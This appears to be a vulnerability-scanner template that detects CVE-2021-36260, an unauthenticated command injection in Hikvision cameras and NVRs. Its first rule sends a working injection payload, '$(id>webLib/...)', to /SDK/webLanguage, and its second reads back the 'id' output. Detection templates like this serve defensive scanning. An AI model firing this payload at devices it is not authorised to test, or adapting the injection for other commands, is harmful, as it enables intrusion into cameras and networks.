id: CVE-2021-36260

info:
  name: Hikvision IP camera/NVR - Unauthenticated RCE
  author: pdteam,gy741
  severity: critical
  verified: true
  description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
  reference:
    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
    - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://github.com/Aiminsun/CVE-2021-36260
  tags: cve,cve2021,rce,hikvision
  created: 2023/08/09

set:
  rand1: randomLowercase(16)
rules:
  r1:
    request:
      method: PUT
      path: /SDK/webLanguage
      headers:
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      body: |
        <?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/{{rand1}})</language>
    expression: response.status == 500
  r2:
    request:
      method: GET
      path: /{{rand1}}
    expression: response.status == 200  && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r1() && r2()